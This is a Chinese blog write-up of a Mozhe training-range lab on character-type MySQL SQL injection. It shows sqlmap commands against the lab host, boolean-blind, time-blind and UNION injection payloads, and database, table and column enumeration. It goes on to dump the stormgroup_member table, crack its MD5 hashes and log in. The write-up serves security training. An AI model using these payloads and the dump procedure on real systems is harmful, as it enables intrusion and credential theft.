墨者靶场-SQL手工注入漏洞测试(MySQL数据库-字符型)

已于 2023-08-24 22:03:34 修改
阅读量152 收藏
点赞数
分类专栏: 墨者靶场writeup 文章标签: 网络安全 sql web安全 mysql 数据库
于 2023-08-24 22:02:59 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Sa1nZen/article/details/132483510
版权
SQL手工注入漏洞测试(MySQL数据库-字符型)

一、漏洞假设
在这里插入图片描述
在这里插入图片描述

1、首先是应该遍历所有的URL
(一开始漏掉第二个URL导致STUCK)
2、URL1是POST注入
3、URL2是GET注入
根据提示漏洞点在URL2

二、漏洞探测

探测思路:
1、使用sqlmap(优先)
2、手工注入

#探测是否有漏洞
sqlmap -u "http://124.70.91.203:40995/new_list.php?id=tingjigonggao" -o --batch
#-o为优化性能
#--batch为默认
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=tingjigonggao' AND 2478=2478 AND 'hRkp'='hRkp

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=tingjigonggao' AND (SELECT 4528 FROM (SELECT(SLEEP(5)))CUeE) AND 'gDuR'='gDuR

Type: UNION query
Title: Generic UNION query (NULL) - 4 columns
Payload: id=-4314' UNION ALL SELECT NULL,NULL,CONCAT(0x7171626271,0x69796a61554c7961684f426c4a77437850475565696958776d544e4e7549794a68476e6d4e677162,0x716b707171),NULL-- -

[09:32:54] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.6.37
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)

#根据sqlmap的探测可以知道sql注入的类型为
#GET 字符型 单引号
#布尔盲注 时间盲注 联合查询

#脱裤
sqlmap -u "http://124.70.91.203:40995/new_list.php?id=tingjigonggao" -o -batch -a
#-a 脱裤所有 不建议直接使用

#当期数据库
sqlmap -u "http://124.70.91.203:40995/new_list.php?id=tingjigonggao" -o --batch --current-db
#current database: 'mozhe_discuz_stormgroup'

#所有数据库
sqlmap -u "http://124.70.91.203:40995/new_list.php?id=tingjigonggao" -o --batch --dbs
# available databases[5] 
# [*] information_schema
# [*] mozhe_discuz_stormgroup
# [*] mysql
# [*] performance_schema
# [*] test

#当期数据库的所有表
sqlmap -u "http://124.70.91.203:40995/new_list.php?id=tingjigonggao" -o --batch -D 'mozhe_discuz_stormgroup' --tables
# Database: mozhe_discuz_stormgroup
# [2 tables]
# +-------------------+
# | notice            |
# | stormgroup_member |
# +-------------------+

#当期数据库的某表的字段
sqlmap -u "http://124.70.91.203:40995/new_list.php?id=tingjigonggao" -o --batch -D 'mozhe_discuz_stormgroup' -T 'stormgroup_member' --columns
# Database: mozhe_discuz_stormgroup
# Table: stormgroup_member
# [4 columns]
# +----------+--------------+
# | Column   | Type         |
# +----------+--------------+
# | name     | varchar(20)  |
# | status   | int(11)      |
# | id       | int(11)      |
# | password | varchar(255) |
# +----------+--------------+

#当期数据库的某表的内容
sqlmap -u "http://124.70.91.203:40995/new_list.php?id=tingjigonggao" -o --batch -D 'mozhe_discuz_stormgroup' -T 'stormgroup_member' --dump
# Database: mozhe_discuz_stormgroup
# Table: stormgroup_member
# [2 entries]
# +----+--------+----------+----------------------------------+
# | id | name   | status   | password                         |
# +----+--------+----------+----------------------------------+
# | 2  | mozhe  | 0        | 356f589a7df439f6f744ff19bb8092c0 |
# | 1  | mozhe  | 1        | 22b618b90f098a0e180ace5c992566a8 |
# +----+--------+----------+----------------------------------+


mozhe   356f589a7df439f6f744ff19bb8092c0
mozhe   22b618b90f098a0e180ace5c992566a8

推测为md5值,使用cmd5解密得出
mozhe   dsan13
mozhe   883073

使用第二个口令成功登录

在这里插入图片描述

三、漏洞总结

1、靶场SQL注入类型
#GET 字符型 单引号
#布尔盲注 时间盲注 联合查询
2、对页面需进行全面的URL收集,即可注入点的收集
3、优先使用sqlmap进行,手工注入方法请参考sql-lab的博客
Sa1nZen
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
APP原实例:墨者科技-旅行小蜜APP2.0.rp
12-17
产品经理
SQL手工注入+sqlmap工具测试漏洞测试(MySQL数据库字符注入
全村的希望
11-25 1201
SQL手工注入+sqlmap工具测试漏洞测试(MySQL数据库字符注入
墨者靶场SQL手工注入漏洞测试(MySQL数据库-字符)
zyh1588的博客
11-01 139
小白回顾墨者靶场手工注入
SQL手工注入漏洞测试(mysql字符
weixin_45445398的博客
03-01 356
看到url中熟悉的id=,就尝试加上and 1=1,但是这边是字符注入所以要加上时传递过去闭合加上单引号’and 1=1发现还是出错结尾加上%23(在一个语句结尾时,需要用#结尾,%23url的编码就是#)得到数据库版本号和数据库名时,在mysql数据库中自带数据库名为information_schema,它是一个存储记录所有数据库名表名,列名的数据库这时候就开始拼接SQL语句。发现回显的地方是2,3这时候就要用version() 获得数据库版本database()获得数据库名字。
WEB常见漏洞SQL注入靶场篇—1)
One-Fox安全团队的博客
05-05 3407
sqli靶场SqliLabs 是一个学习 SQL 注入靶场,它提供了 GET 和 POST 的实验场景,涵盖了联合查询注入、基于报错的注入、基于时间的盲注、基于布尔的盲注、堆叠注入、二次注入以及各种注入绕过。
0080 APP原实例:墨者科技-旅行小蜜APP2.0.rp
01-06
rp原源文件
墨者有巨子腹-居秦阅读答案】墨者有巨子腹.docx
11-13
墨者有巨子腹-居秦阅读答案】墨者有巨子腹.docx
墨者安全软件-免费杀毒软件
11-11
墨者安全专家是一款永久免费的免疫安全防护软件,集墨者独创的 “革离术”、终身免费杀毒、修复系统漏洞、上网痕迹清理、网络防火墙、系统实时保护、安全互助社区等强大功能于一身。特别是独创的“革离术”,利用...
WebShell文件上传漏洞分析溯源
02-22
WebShell文件上传漏洞
墨者学院-SQL手工注入漏洞测试(MySQL数据库)
m0_73681638的博客
06-16 272
通常 Sql 注入漏洞分为 2 种类:数字字符。数字判断:在加载好的Url 地址中输入and 1=1,页面依旧运行正常,继续进行下一步。断网页是否存在sql注入使用单引号判断法:在参数后面加上单引号, 原因为无论字符还是整都会 因为单引号个数不匹配而报错。使用火狐插件—hackbar,加载出当前界面的url,使用单引号判断法,页面返回错误,存在 Sql 注 入。
sql注入-墨者学院SQL手工注入漏洞测试(MySQL数据库)
m0_75178803的博客
04-15 737
猜解列名字段数(数量) order by x 错误与正常的正常值的的连接点。union select 1,2,3,4 页面正常。回到题目上来,我们在id=1后面随意输入一些东西。order by 4,页面正常。order by 1,网站正常。order by 5,页面错误。文章基于小迪sql注入的复现。页面错误,说明id为注入点。我们即可得知有4个字段数。and 1=1 页面正常。and 1=2 页面错误。
SQL手工注入漏洞测试(MySQL数据库-字符)-墨者
最新发布
weoptions的博客
12-01 1600
———靶场专栏———分享我的解题过程
墨者学院05 SQL手工注入漏洞测试(MySQL数据库-字符)
weixin_42789937的博客
01-25 266
墨者学院05 SQL手工注入漏洞测试(MySQL数据库-字符),看见SQL内心已经没什么波澜...
SQL手工注入漏洞测试(MySQL数据库)
chinacqzgp的博客
09-18 1729
墨者学院靶场sql注入MySQL数据库
Pikachu靶场SQL注入、远程代码执行、文件包含漏洞
Jach1n
02-01 591
Pikachu靶场SQL注入、远程代码执行、文件包含漏洞
sql注入靶场安装/POST注入基础/一看就会
ChenD的学习笔记
10-05 750
SQL注入(二)post注入方法
Pikachu靶场通关笔记--Sql Inject(SQL注入)
weixin_45908624的博客
12-09 2546
sql注入
靶场实践之SQL注入
Stephen8848的博客
08-14 284
渗透测试的时候使用工具是很简单的,但是要是对技术有追求,还是需要了解得更深入一些,多探索!安装系统自行百度,这里不做过多说明。版本5之后,数据库里有一个默认的库。它里面有三个关键的表,分别是。
墨者-sql手工注入漏洞测试
04-29
墨者安全团队是一支专注于网络安全领域的团队,他们致力于网络安全研究...总的来说,墨者安全团队的手工注入漏洞测试方法比较系统和全面,可以有效地发现目标网站中存在的注入漏洞,从而帮助企业提高网络安全防护水平。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值